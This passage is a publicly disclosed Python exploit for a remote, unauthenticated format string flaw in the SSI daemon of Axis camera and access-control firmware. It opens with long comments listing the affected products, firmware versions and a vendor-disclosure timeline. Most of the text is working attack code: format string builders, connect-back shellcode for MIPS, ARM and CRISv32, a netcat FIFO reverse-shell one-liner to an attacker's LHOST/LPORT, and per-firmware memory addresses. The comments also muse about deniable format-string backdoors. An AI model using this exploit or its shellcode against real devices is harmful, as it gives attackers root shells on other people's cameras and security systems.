[Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



#!/usr/bin/env python2.7
# 
# [SOF]
#
# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon
# Research and development by bashis <mcw noemail eu> 2016
#
# This format string vulnerability has following characteristic:
# - Heap Based (Exploiting string located on the heap)
# - Blind Attack (No output the remote attacker)(*)
# - Remotly exploitable (As anonymous, no credentials needed)
#
# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic.
#
# This exploit has following characteristic:
# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]
# - Modifying LHOST/LPORT in shellcode on the fly
# - Manual exploiting of remote targets
# - Simple HTTPS support
# - Basic Authorization support (not needed for this exploit)
# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode
# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)
# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root
# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root)
# - Multiple FMS exploit techniques
#   - "One-Write-Where-And-What" for MIPS and CRISv32
#     Using "Old Style" POP's
#     Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call
#     Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory.
#   - "Two-Write-Where-And-What" for ARM
#     1) "Old Style": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address
#     2) "New Style": ARM Arch's have both "Old Style" (>5.50.x) )POPs and "New Style" (<5.40.x) direct parameter access for POP/Write
#     [Big differnce in possibilities between "Old Style" and "New Style", pretty interesting actually]
# - Another way to POP with "Old Style", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x)
# - Exploit is quite well documented
#
# Anyhow,
# Everything started from this simple remote request:
#
# ---
# $ echo -en "GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\n\n" | netcat 192.168.0.90 80
# HTTP/1.1 500 Server Error
# Content-Type: text/html; charset=ISO-8859-1
#
# <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD>
# <BODY><H1>500 Server Error</H1>
# The server encountered an internal error and could not complete your request.
# </BODY></HTML>
# ---
#
# Which gave this output in /var/log/messages on the remote device:
#
# ---
# <CRITICAL> Jan  1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10
# <CRITICAL> Jan  1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data.
# ---
#
# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products
#
# ---
# $ netcat -vvlp 31337
# listening on [any] 31337 ...
# 192.168.0.90: inverse host lookup failed: Unknown host
# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz)
# pwd
# /usr/html
# ---
#
# Some technical notes:
#
# 1.  Direct addressing with %<argument>$%n is "delayed", and comes in force only after disconnect.
#     Old metod with POP's coming into force instantly
#
# 2.  Argument "0" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's)
#     - Would be interesting to investigate why.
#
# 3.  Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26
#     Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff
#
# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff
#     Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f
#
# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit:
#     Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!)
#
# 4.  Everything is randomized, except heap.
#
# 5.  My initial attempts to use ROP's was not good, as I didn't want to create
#     one unique FMS key by testing each single firmware version, and using ROP with FMS
#     on heap seems pretty complicated as there is one jump availible, maximum two.
#
# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case.
#    
# 6.  Encoded and Decoded shellcode located in .bss section.
# 6.1 FMS excecuted on heap
#
# 7.  Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM
# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs,
#     so execute shellcode on heap/stack may be impossible.
# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries,
#     and re-compile of the image.
# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute.
#
# 8.  This exploit are pretty well documented, more details can be extracted by reading
#     the code and comments.
#
# MIPS ssid maps
# 00400000-0040d000 r-xp 00000000 00:01 2272       /bin/ssid
# 0041d000-0041e000 rw-p 0000d000 00:01 2272       /bin/ssid
# 0041e000-00445000 rwxp 00000000 00:00 0          [heap]
#
# ARM ssid maps
# 00008000-00014000 r-xp 00000000 00:01 2055        /bin/ssid
# 0001c000-0001d000 rw-p 0000c000 00:01 2055        /bin/ssid
# 0001d000-00044000 rw-p 00000000 00:00 0           [heap]
#
# Crisv32 ssid maps
# 00080000-0008c000 r-xp 00000000 1f:03 115        /bin/ssid
# 0008c000-0008e000 rw-p 0000a000 1f:03 115        /bin/ssid
# 0008e000-000b6000 rwxp 0008e000 00:00 0          [heap]
#
# General notes:
#
# When the vul daemon process is exploited, and after popping root connect-back shell,
# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process,
# when the main process are fully alive again, I can enjoy the shell, and everybody else can
# enjoy of the camera - that should make all of us happy ;)
# During exploiting, logs says almost nothing, only that the main process restarted.
# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits)
#
# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(),
# after ssid cannot verify the user, free() are the closest function to be called after
# vsyslog(), needed and perfect to use for jumping.
# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console.
# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics.
#
# Quite surprised to see so many different devices and under one major release version,
# that's covered by one "FMS key". The "FMS key" are valid for all minor versions under the major version.
#
# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor,  
# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password.    
#
# - No hardcoded login/password that could easily be found in firmware/software files.    
# - Extremely hard to find without local access (and find out what to trigger for opening the door)
# - Nobody can not actually prove it is a sophisticated door for sure. "It's just another bug.. sorry! - here is the fixed version."
#   (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find)
#
# Note:
# I don't say that Axis Communication has made this hidden format string by this purpose.
# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon,    
# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr().
#
# Vulnerable and exploitable products
#
# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006,
# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364,
# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215,
# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384,
# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624,
# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E,
# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT,
# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045,
# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E,
# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203,
# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E,
# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E,
# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C,
# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W,
# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L,
# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more
#
# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
#
# Firmware versions vulnerable to the SSI FMS exploit
#
# ('V.Vx' == The FMS key used in this exploit)
#
# Firmware	Introduced	CRISv32		MIPS		ARM (no exec heap from >5.20.x)
# 5.00.x	2008		-		-		no
# 5.01.x	2008		no		-		no
# 5.02.x	2008		no		-		-
# 5.05.x	2009		no		-		-
# 5.06.x	2009		no		-		-
# 5.07.x	2009		no		-		no
# 5.08.x	2010		no		-		-
# 5.09.x	2010		no		-		-
# 5.10.x	2009		no		-		-
# 5.11.x	2010		no		-		-
# 5.12.x	2010		no		-		-
# 5.15.x	2010		no		-		-
# 5.16.x	2010		no		-		-
# 5.20.x	2010-2011	5.2x		-		5.2x
# 5.21.x	2011		5.2x		-		5.2x
# 5.22.x	2011		5.2x		-		-
# 5.25.x	2011		5.2x		-		-
# 5.40.x	2011		5.4x		5.4x		5.4x
# 5.41.x	2012		5.4x		-		-
# 5.50.x	2013		5.5x		5.5x		5.4x
# 5.51.x	2013		-		5.4x		-
# 5.55.x	2013		-		5.5x		5.5x
# 5.60.x	2014		-		5.6x		5.6x
# 5.65.x	2014-2015	-		5.6x		-
# 5.70.x	2015		-		5.7x		-
# 5.75.x	2015		-		5.7x		5.7x
# 5.80.x	2015		-		5.8x		5.8x
# 5.81.x	2015		-		5.8x		-
# 5.85.x	2015		-		5.8x		5.8x
# 5.90.x	2015		-		5.9x		-
# 5.95.x	2016		-		5.9x		5.8x
# 6.10.x	2016		-		6.1x		-
# 6.15.x	2016		-		-		6.1x
# 6.20.x	2016		-		6.2x		-
#
# Vendor URL's of still supported and affected products
#
# http://www.axis.com/global/en/products/access-control
# http://www.axis.com/global/en/products/video-encoders
# http://www.axis.com/global/en/products/network-cameras
# http://www.axis.com/global/en/products/audio
#
# Axis Product Security
#
# product-security@xxxxxxxx
# http://www.axis.com/global/en/support/product-security
# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
# http://www.axis.com/global/en/support/faq/FAQ116268
#
# Timetable
#
# - Research and Development: 06/01/2016 - 01/06/2016
# - Sent vulnerability details to vendor: 05/06/2016
# - Vendor responce received: 06/06/2016
# - Vendor ACK of findings received: 07/06/2016
# - Vendor sent verification image: 13/06/2016
# - Confirmed that exploit do not work after vendors correction: 13/06/2016
# - Vendor informed about their service release(s): 29/06/2016
# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016
# - Full Disclosure: 18/07/2016
#
# Quote of the day: Never say "whoops! :o", always say "Ah, still interesting! :>"
#
# Have a nice day
# /bashis
#
#####################################################################################

import sys
import string
import socket
import time
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import re


class do_FMS:

#	POP = "%8x"		# Old style POP's with 8 bytes per POP
	POP = "%1c"		# Old style POP's with 1 byte per POP
	WRITElln = "%lln"	# Write 8 bytes
	WRITEn = "%n"		# Write 4 bytes
	WRITEhn = "%hn"		# Write 2 bytes
	WRITEhhn = "%hhn"	# Write 1 byte

	def __init__(self,targetIP,verbose):
		self.targetIP = targetIP
		self.verbose = verbose
		self.fmscode = ""

	# Mostly used internally in this function
	def Add(self, data):
		self.fmscode += data

	# 'New Style' Double word (8 bytes)
	def AddDirectParameterLLN(self, ADDR):
		self.Add('%')
		self.Add(str(ADDR))
		self.Add('$lln')

	# 'New Style' Word (4 bytes)
	def AddDirectParameterN(self, ADDR):
		self.Add('%')
		self.Add(str(ADDR))
		self.Add('$n')

	# 'New Style' Half word (2 bytes)
	def AddDirectParameterHN(self, ADDR):
		self.Add('%')
		self.Add(str(ADDR))
		self.Add('$hn')

	# 'New Style' One Byte (1 byte)
	def AddDirectParameterHHN(self, ADDR):
		self.Add('%')
		self.Add(str(ADDR))
		self.Add('$hhn')

	# Addressing
	def AddADDR(self, ADDR):
		self.Add('%')
		self.Add(str(ADDR))
		self.Add('u')

	# 'Old Style' POP
	def AddPOP(self, size):
		if size != 0:
			self.Add(self.POP * size)

	# Normally only one will be sent, multiple is good to quick-check for any FMS
	#
	# 'Old Style' Double word (8 bytes)
	def AddWRITElln(self, size):
			self.Add(self.WRITElln * size)

	# 'Old Style' Word (4 bytes)
	def AddWRITEn(self, size):
			self.Add(self.WRITEn * size)

	# 'Old Style' Half word (2 bytes)
	def AddWRITEhn(self, size):
			self.Add(self.WRITEhn * size)

	# 'Old Style' One byte (1 byte)
	def AddWRITEhhn(self, size):
			self.Add(self.WRITEhhn * size)

	# Return the whole FMS string
	def FMSbuild(self):
		return self.fmscode

class HTTPconnect:

	def __init__(self, host, proto, verbose, creds, noexploit):
		self.host = host
		self.proto = proto
		self.verbose = verbose
		self.credentials = creds
		self.noexploit = noexploit
	
	# Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\t','$','`' etc..
	def RAW(self, uri):
		# Connect-timeout in seconds
		timeout = 5
		socket.setdefaulttimeout(timeout)
		
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
		tmp = self.host.split(':')
		HOST = tmp[0]
		PORT = int(tmp[1])
		if self.verbose:
			print "[Verbose] Sending to:", HOST
			print "[Verbose] Port:", PORT
			print "[Verbose] URI:",uri
		s.connect((HOST, PORT))
		s.send("GET %s HTTP/1.0\r\n\r\n" % uri)
		html = (s.recv(4096)) # We really do not care whats coming back
#		if html:
#			print "[i] Received:",html
		s.shutdown(3)
		s.close()
		return html


	def Send(self, uri):

		# The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually
		# matter for the functionality of this exploit, only for future references.
		headers = { 
			'User-Agent' : 'MSIE',
		}

		# Connect-timeout in seconds
		timeout = 5
		socket.setdefaulttimeout(timeout)

		url = '%s://%s%s' % (self.proto, self.host, uri)

		if self.verbose:
			print "[Verbose] Sending:", url

		if self.proto == 'https':
			if hasattr(ssl, '_create_unverified_context'):
				print "[i] Creating SSL Default Context"
				ssl._create_default_https_context = ssl._create_unverified_context

		if self.credentials:
			Basic_Auth = self.credentials.split(':')
			if self.verbose:
				print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1]
			try:
				pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
				pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
				auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
				opener = urllib2.build_opener(auth_handler)
				urllib2.install_opener(opener)
			except Exception as e:
				print "[!] Basic Auth Error:",e
				sys.exit(1)

		if self.noexploit and not self.verbose:
			print "[<] 204 Not Sending!"
			html =  "Not sending any data"
		else:
			data = None
			req = urllib2.Request(url, data, headers)
			rsp = urllib2.urlopen(req)
			if rsp:
				print "[<] %s OK" % rsp.code
				html = rsp.read()
		return html


class shellcode_db:

	def __init__(self,targetIP,verbose):
		self.targetIP = targetIP
		self.verbose = verbose

	def sc(self,target):
		self.target = target


# Connect back shellcode
#
# CRISv32: Written by myself, no shellcode availible out on "The Internet"
# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators
# MIPSel: Written by Jacob Holcomb (url encoded by me)
# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php
#
		# Slightly modified syscall's
		MIPSel = string.join([
		#close stdin
		"%ff%ff%04%28" #slti	a0,zero,-1
		"%a6%0f%02%24" #li	v0,4006
		"%4c%f7%f7%03" #syscall	0xdfdfd
		#close stdout
		"%11%11%04%28" #slti	a0,zero,4369
		"%a6%0f%02%24" #li	v0,4006
		"%4c%f7%f7%03" #syscall 0xdfdfd
		#close stderr
		"%fd%ff%0c%24" #li	t4,-3
		"%27%20%80%01" #nor	a0,t4,zero
		"%a6%0f%02%24" #li	v0,4006
		"%4c%f7%f7%03" #syscall 0xdfdfd
		# socket AF_INET (2)
		"%fd%ff%0c%24" #li	t4,-3
		"%27%20%80%01" #nor	a0,t4,zero
		"%27%28%80%01" #nor	a1,t4,zero
		"%ff%ff%06%28" #slti	a2,zero,-1
		"%57%10%02%24" #li	v0,4183
		"%4c%f7%f7%03" #syscall 0xdfdfd
		#
		"%ff%ff%44%30" # andi $a0, $v0, 0xFFFF
		#
		# dup2 stdout
		"%c9%0f%02%24" #li	v0,4041
		"%4c%f7%f7%03" #syscall 0xdfdfd
		#
		# dup2 stderr
		"%c9%0f%02%24" #li	v0,4041
		"%4c%f7%f7%03" #syscall 0xdfdfd
		#
		# Port
		"PP1PP0%05%3c"
		"%01%ff%a5%34"
		#
		"%01%01%a5%20" #addi	a1,a1,257
		"%f8%ff%a5%af" #sw	a1,-8(sp)
		#
		# IP
		"IP3IP4%05%3c"
		"IP1IP2%a5%34"
		#
		"%fc%ff%a5%af" #sw	a1,-4(sp)
		"%f8%ff%a5%23" #addi	a1,sp,-8
		"%ef%ff%0c%24" #li	t4,-17
		"%27%30%80%01" #nor	a2,t4,zero
		"%4a%10%02%24" #li	v0,4170
		"%4c%f7%f7%03" #syscall 0xdfdfd
		#
		"%62%69%08%3c" #lui	t0,0x6962
		"%2f%2f%08%35" #ori	t0,t0,0x2f2f
		"%ec%ff%a8%af" #sw	t0,-20(sp)
		"%73%68%08%3c" #lui	t0,0x6873
		"%6e%2f%08%35" #ori	t0,t0,0x2f6e
		"%f0%ff%a8%af" #sw	t0,-16(sp
		"%ff%ff%07%28" #slti	a3,zero,-1
		"%f4%ff%a7%af" #sw	a3,-12(sp)
		"%fc%ff%a7%af" #sw	a3,-4(sp
		"%ec%ff%a4%23" #addi	a0,sp,-20
		"%ec%ff%a8%23" #addi	t0,sp,-20
		"%f8%ff%a8%af" #sw	t0,-8(sp)
		"%f8%ff%a5%23" #addi	a1,sp,-8
		"%ec%ff%bd%27" #addiu	sp,sp,-20
		"%ff%ff%06%28" #slti	a2,zero,-1
		"%ab%0f%02%24" #li	v0,4011 (execve)
		"%4c%f7%f7%03" #syscall 0xdfdfd
		], '')	

		# Working netcat shell
		# - $PATH will locate 'mkfifo', 'nc' and 'rm'
		# - LHOST / LPORT will be changed on the fly later in the code
		# - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting
		# - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator]
		# $ echo -n "$IFS" | hexdump -C
		# 00000000  20 09 0a
		# - $PS1 = $ [By default, and we need something to "comment" out our trailing FMS code from /bin/sh -c]
		#
		# '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator
		#
		# Working with Apache and Boa
#		NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s\"$IFS\"2>/tmp/s;rm$IFS/tmp/s;$PS1"
		NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1"

		ARMel = string.join([
		# original: http://shell-storm.org/shellcode/files/shellcode-754.php
		# 32-bit instructions, enter thumb mode
		"%01%10%8f%e2"	# add r1, pc, #1
		"%11%ff%2f%e1"	# bx r1

		# 16-bit thumb instructions follow
		#
		# socket(2, 1, 0)
		"%02%20"	#mov     r0, #2
		"%01%21"	#mov     r1, #1
		"%92%1a"	#sub     r2, r2, r2
		"%0f%02"	#lsl     r7, r1, #8
		"%19%37"	#add     r7, r7, #25
		"%01%df"	#svc     1
		#
		# connect(r0, &addr, 16)
		"%06%1c"	#mov     r6, r0
		"%08%a1"	#add     r1, pc, #32
		"%10%22"	#mov     r2, #16
		"%02%37"	#add     r7, #2
		"%01%df"	#svc     1
		#
		# dup2(r0, 0/1/2)
		"%3f%27"	#mov     r7, #63
		"%02%21"	#mov     r1, #2
		#
		#lb:
		"%30%1c"	#mov     r0, r6
		"%01%df"	#svc     1
		"%01%39"	#sub     r1, #1
		"%fb%d5"	#bpl     lb
		#
		# execve("/bin/sh", ["/bin/sh", 0], 0)
		"%05%a0"	#add     r0, pc, #20
		"%92%1a"	#sub     r2, r2, r2
		"%05%b4"	#push    {r0, r2}
		"%69%46"	#mov     r1, sp
		"%0b%27"	#mov     r7, #11
		"%01%df"	#svc     1
		#
		"%c0%46"	# .align 2 (NOP)
		"%02%00"	# .short 0x2		(struct sockaddr)
		"PP1PP0"	# .short 0x3412		(port: 0x1234)
		"IP1IP2IP3IP4"	#.byte 192,168,57,1	(ip: 192.168.57.1)
		# .ascii "/bin/sh\0\0"
		"%2f%62%69%6e"	# /bin
		"%2f%73%68%00%00"	# /sh\x00\x00
		"%00%00%00%00"
		"%c0%46"
		], '')	


		# Connect-back shell for Axis CRISv32
		# Written by mcw noemail eu 2016
		#
		CRISv32 = string.join([
		#close(0)
		"%7a%86"		# clear.d r10 
		"%5f%9c%06%00"		# movu.w 0x6,r9
		"%3d%e9"		# break 13
		#close(1)
		"%41%a2"		# moveq 1,r10
		"%5f%9c%06%00"		# movu.w 0x6,r9
		"%3d%e9"		# break 13
		#close(2)
		"%42%a2"		# moveq 2,r10
		"%5f%9c%06%00"		# movu.w 0x6,r9
		"%3d%e9"		# break 13
		#
		"%10%e1"		# addoq 16,sp,acr
		"%42%92"		# moveq 2,r9
		"%df%9b"		# move.w r9,[acr]
		"%10%e1"		# addoq 16,sp,acr
		"%02%f2"		# addq 2,acr
		#PORT
		"%5f%9ePP1PP0"		# move.w 0xPP1PP0,r9 #
		"%df%9b"		# move.w r9,[acr]
		"%10%e1"		# addoq 16,sp,acr
		"%6f%96"		# move.d acr,r9
		"%04%92"		# addq 4,r9
		#IP
		"%6f%feIP1IP2IP3IP4"	# move.d IP4IP3IP2IP1,acr
		"%e9%fb"		# move.d acr,[r9]
		#
		#socket()
		"%42%a2"		# moveq 2,r10
		"%41%b2"		# moveq 1,r11
		"%7c%86"		# clear.d r12
		"%6e%96"		# move.d $sp,$r9
		"%e9%af"		# move.d $r10,[$r9+]
		"%e9%bf"		# move.d $r11,[$r9+]
		"%e9%cf"		# move.d $r12,[$r9+]
		"%41%a2"		# moveq 1,$r10
		"%6e%b6"		# move.d $sp,$r11
		"%5f%9c%66%00"		# movu.w 0x66,$r9
		"%3d%e9"		# break 13
		#
		"%6a%96"		# move.d $r10,$r9
		"%0c%e1"		# addoq 12,$sp,$acr
		"%ef%9b"		# move.d $r9,[$acr]
		"%0c%e1"		# addoq 12,$sp,$acr
		"%6e%96"		# move.d $sp,$r9
		"%10%92"		# addq 16,$r9
		"%6f%aa"		# move.d [$acr],$r10
		"%69%b6"		# move.d $r9,$r11
		"%50%c2"		# moveq 16,$r12
		#
		# connect()
		"%6e%96"		# move.d $sp,$r9
		"%e9%af"		# move.d $r10,[$r9+]
		"%e9%bf"		# move.d $r11,[$r9+]
		"%e9%cf"		# move.d $r12,[$r9+]
		"%43%a2"		# moveq 3,$r10
		"%6e%b6"		# move.d $sp,$r11
		"%5f%9c%66%00"		# movu.w 0x66,$r9 
		"%3d%e9"		# break 13
		# dup(0) already in socket
		#dup(1)
		"%6f%aa"		# move.d [$acr],$r10
		"%41%b2"		# moveq 1,$r11
		"%5f%9c%3f%00"		# movu.w 0x3f,$r9
		"%3d%e9"		# break 13
		#
		#dup(2)
		"%6f%aa"		# move.d [$acr],$r10
		"%42%b2"		# moveq 2,$r11
		"%5f%9c%3f%00"		# movu.w 0x3f,$r9
		"%3d%e9"		# break 13
		#
		#execve("/bin/sh",NULL,NULL)
		"%90%e2"		# subq 16,$sp
		"%6e%96"		# move.d $sp,$r9
		"%6e%a6"		# move.d $sp,$10
		"%6f%0e%2f%2f%62%69"	# move.d 69622f2f,$r0
		"%e9%0b"		# move.d $r0,[$r9]
		"%04%92"		# addq 4,$r9
		"%6f%0e%6e%2f%73%68"	# move.d 68732f6e,$r0
		"%e9%0b"		# move.d $r0,[$r9]
		"%04%92"		# addq 4,$r9
		"%79%8a"		# clear.d [$r9]
		"%04%92"		# addq 4,$r9
		"%79%8a"		# clear.d [$r9]
		"%04%92"		# addq 4,$r9
		"%e9%ab"		# move.d $r10,[$r9]
		"%04%92"		# addq 4,$r9
		"%79%8a"		# clear.d [$r9]
		"%10%e2"		# addq 16,$sp
		"%6e%f6"		# move.d $sp,$acr
		"%6e%96"		# move.d $sp,$r9
		"%6e%b6"		# move.d $sp,$r11
		"%7c%86"		# clear.d $r12
		"%4b%92"		# moveq 11,$r9
		"%3d%e9"		# break 13
			], '')	


		if self.target == 'MIPSel':
			return MIPSel
		elif self.target == 'ARMel':
			return ARMel
		elif self.target == 'CRISv32':
			return CRISv32
		elif self.target == 'NCSH1':
			return NCSH
		elif self.target == 'NCSH2':
			return NCSH
		else:
			print "[!] Unknown shellcode! (%s)" % str(self.target)
			sys.exit(1)


class FMSdb:

	def __init__(self,targetIP,verbose):
		self.targetIP = targetIP
		self.verbose = verbose

	def FMSkey(self,target):
		self.target = target

		target_db = {

#-----------------------------------------------------------------------
# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH)
#-----------------------------------------------------------------------

#
# Using POP format string, AKA 'Old Style'
#
		# MPQT
		'MIPS-5.85.x':	 [
				0x41f370,	# Adjust to GOT free() address
				0x420900,	# .bss shellcode address
				2,		# 1st POP's
				2,		# 2nd POP's
				'axi',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-5.40.3': [
				0x41e41c,	# Adjust to GOT free() address
				0x4208cc,	# .bss shellcode address
				7,		# 1st POP's
				11,		# 2nd POP's
				'ax',		# Aligns injected code
				450,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-5.4x': [	
				0x41e4cc,	# Adjust to GOT free() address
				0x42097c,	# .bss shellcode address
				7,		# 1st POP's
				11,		# 2nd POP's
				'ax',		# Aligns injected code
				450,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-5.5x': [
				0x41d11c,	# Adjust to GOT free() address
				0x41f728,	# .bss shellcode address
				5,		# 1st POP's
				15,		# 2nd POP's
				'axis',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-5.55x': [	
				0x41d11c,	# Adjust to GOT free() address
				0x41f728,	# .bss shellcode address
				11,		# 1st POP's
				9,		# 2nd POP's
				'axis',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# Shared with MPQT and PACS
		'MIPS-5.6x': [	
				0x41d048,	# Adjust to GOT free() address
				0x41f728,	# .bss shellcode address
				5,		# 1st POP's
				15,		# 2nd POP's
				'axis',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type

		],

		# MPQT
		'MIPS-5.7x': [	
				0x41d04c,	# Adjust to GOT free() address
				0x41f718,	# .bss shellcode address
				2,		# 1st POP's
				14,		# 2nd POP's
				'axis',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-5.75x': [
				0x41c498,	# Adjust to GOT free() address
				0x41daf0,	# .bss shellcode address
				3,		# 1st POP's
				13,		# 2nd POP's
				'axi',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# Shared with MPQT and PACS
		'MIPS-5.8x': [
				0x41d0c0,	# Adjust to GOT free() address
				0x41e740,	# .bss shellcode address
				3,		# 1st POP's
				13,		# 2nd POP's
				'axi',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-5.9x': [ 
				0x41d0c0,	# Adjust to GOT free() address
				0x41e750,	# .bss shellcode address
				3,		# 1st POP's
				13,		# 2nd POP's
				'axi',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-6.1x': [
				0x41c480,	# Adjust to GOT free() address
				0x41dac0,	# .bss shellcode address
				3,		# 1st POP's
				13,		# 2nd POP's
				'axi',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-6.2x': [
				0x41e578,	# Adjust to GOT free() address
				0x41fae0,	# .bss shellcode address
				2,		# 1st POP's
				2,		# 2nd POP's
				'axi',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-6.20x': [
				0x41d0c4,	# Adjust to GOT free() address
				0x41e700,	# .bss shellcode address
